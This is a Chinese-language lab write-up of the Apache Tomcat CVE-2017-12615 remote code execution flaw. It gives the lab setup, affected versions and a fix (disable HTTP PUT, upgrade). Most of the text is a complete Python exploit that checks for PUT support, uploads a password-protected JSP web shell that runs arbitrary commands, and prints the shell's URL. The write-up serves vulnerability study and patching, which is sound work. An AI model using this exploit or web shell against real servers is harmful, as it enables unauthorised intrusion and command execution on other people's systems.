一、Tomcat遠程代碼執行漏洞(CVE-2017-12615)
1.1 實驗環境
操作機:windows 10 IP:192.168.1.119
目標機:windows 7 IP:192.168.1.102
1.2 漏洞介紹
2017年9月19日,Apache Tomcat官方確認並修復了兩個高危漏洞,其中就有Tomcat遠程代碼執行漏洞,當存在漏洞的Tomcat運行在Windwos主機上,且啟用了HTTP PUT請求方法,攻擊者就可以通過構造的攻擊請求向服務器上傳包含任意代碼的JSP文件,造成任意代碼執行,危害十分嚴重。
1.3 影響范圍
受影響的版本:Tomcat 7.0.0-7.0.81
不受影響的版本:Tomcat 8.x ,Tomcat 9.x
1.4 漏洞分析
在Tomcat安裝目錄下的conf文件夾下的配置文件web.xml中的org.apache.catalina.servlets.DefaultServlet方法下如果該方法有如下代碼,即表示Tomcat已開啟PUT方法,默認情況下HTTP PUT方法是不開啟的。
1.5 漏洞修復
禁用HTTP PUT方法
將Tomcat版本升級到8.x或9.x版本。
1.6 漏洞復現
目標站點,明確兩個前提條件,windows主機和開啟http put方法
開始攻擊
exp.py內容:
#! -*- coding:utf-8 -*-
import httplib
import sys
import time
body = '''<%@ page language="java" import="java.util.*,java.io.*" pageEncoding="UTF-8"%><%!public static String excuteCmd(String c) {StringBuilder line = new StringBuilder();try {Process pro = Runtime.getRuntime().exec(c);BufferedReader buf = new BufferedReader(new InputStreamReader(pro.getInputStream()));String temp = null;while ((temp = buf.readLine()) != null) {line.append(temp
+"\\n");}buf.close();} catch (Exception e) {line.append(e.getMessage());}return line.toString();}%><%if("hacker".equals(request.getParameter("pwd"))&&!"".equals(request.getParameter("cmd"))){out.println("<pre>"+excuteCmd(request.getParameter("cmd"))+"</pre>");}else{out.println("Test By 夜上星辰");}%>'''
try:
conn = httplib.HTTPConnection(sys.argv[1])
conn.request(method='OPTIONS', url='/ffffzz')
headers = dict(conn.getresponse().getheaders())
if 'allow' in headers and \
headers['allow'].find('PUT') > 0 :
conn.close()
conn = httplib.HTTPConnection(sys.argv[1])
url = "/" + str(int(time.time()))+'.jsp/'
#url = "/" + str(int(time.time()))+'.jsp::$DATA'
conn.request( method='PUT', url= url, body=body)
res = conn.getresponse()
if res.status == 201 :
#print 'shell:', 'http://' + sys.argv[1] + url[:-7]
print 'shell:', 'http://' + sys.argv[1] + url[:-1]
elif res.status == 204 :
print 'file exists'
else:
print 'error'
conn.close()
else:
print 'Server not vulnerable'
except Exception,e:
print 'Error:', e